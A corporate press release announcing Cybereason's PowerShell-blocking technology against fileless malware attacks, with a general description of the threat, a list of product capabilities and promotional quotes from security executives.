Fileless malware attacks have gained traction among adversaries in recent years. In fact, one third of organizations faced a fileless malware attack in 2017 according to the SANS 2017 Threat Landscape Survey. Unlike attacks carried out by traditional malware, these malicious operations don’t require the attackers to install a single piece of software on a target’s machine. Instead, fileless malware attacks leverage legitimate applications and IT tools built into Windows, particularly PowerShell, for malicious activity. The malicious use of otherwise legitimate programs makes detecting and preventing these attacks particularly challenging since they are generally trusted by default.
How Cybereason’s PowerShell Blocking Technology Works
Unlike other solutions offered by EDR vendors, Cybereason’s technology looks at not only the raw script or command line, but at every action taken by the code that's running within the Powershell engine. This visibility enables behavioral analysis not only at the process level, but also deeper, on the PowerShell code level, in order to block malicious scripts before they execute.
The Cybereason solution has unique and powerful capabilities including:
? Addressing all versions of PowerShell, including the most common and least secure PowerShell version 2
? Handling every type of invocation of PowerShell, including command line, interactive, script file and loading of System.Management.Automation.dll by managed or unmanaged processes
? Coping with obfuscation of any kind
? Notifying analysts about the attack and providing relevant details, such as the users and machines involved
The PowerShell protection technology is part of Cybereason’s NGAV offering. Current customers will be upgraded for free.
“Fileless malware attacks can be devastating for security teams and their organizations. Not only can these attacks bypass antivirus and even EDR software, but many traditional approaches to security are rendered useless in the face of these attacks,” said Sam Curry, Chief Security Officer, Cybereason. “While the competition claims to block PowerShell attacks, their exploit blocking is based entirely on command line and will miss a lot of malicious activities and runs the risk of stopping legitimate use indiscriminately. The Cybereason solution is the industry’s only solution for preventing and blocking this escalating attack vector.”
"Enterprises face a real challenge today detecting fileless malware attacks, and with the easy availability of these techniques on the market, they present yet another security challenge for SOCs and security analysts," said Nick Percoco, Chief Security Officer at Uptake and Cybereason Advisory Board Member. "Cybereason's solution to detect and prevent malicious PowerShell activities is an important development and a breath of fresh air due to the prevalence of these attacks.”
